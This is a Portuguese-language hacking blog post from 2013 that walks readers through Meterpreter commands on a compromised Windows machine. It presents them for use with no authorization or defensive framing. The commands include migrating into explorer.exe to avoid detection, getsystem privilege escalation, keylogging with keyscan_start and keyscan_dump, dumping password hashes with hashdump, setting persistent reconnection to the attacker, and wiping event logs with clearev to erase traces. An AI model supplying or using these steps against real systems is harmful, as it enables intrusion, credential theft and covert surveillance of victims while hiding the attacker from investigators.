segunda-feira, 29 de julho de 2013

Tutorial Kali Linux - Comandos Meterpreter

Olá mais uma vez,
Esse tutorial tem como objetivo mostrar como usar o Metasploit Framework para explorar uma máquina alvo, nesse tutorial partimos do princípio que vc já abriu uma sessão no meterpreter, caso ainda não tenha conseguido pode tentar algumas de nossas dicas como essa aqui: 
Após abrir a sessão a melhor sugestão é migrarmos para um processo mais estável e que torne mais difícil vc ser detectado para isso precisamos listar todos os processos disponíveis usando o comando ps
Será exibido uma tela semelhante a essa



Aqui podemos visualizar todos os processos em execução, uma sugestão é migrarmos para o processo explorer.exe para isso precisamos localizar esse processo na lista e ver qual o valor do PID daí migramos para ele usando o comando migrate 1708 (troque o número 1708 pelo número do seu PID)

Seguem-se agora algumas opções:

sysinfo - esse comando vai mostrar qual a versão do windows da máquina alvo.
 
getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo
keyscan_dump - Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X - Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev - Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

Bom essas são apenas algumas dicas  pra vocês irem brincando um pouco. :)
Usando o comando help vc também pode descobrir várias outras opções.

Espero que tenham gostado e até a próxima.


← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86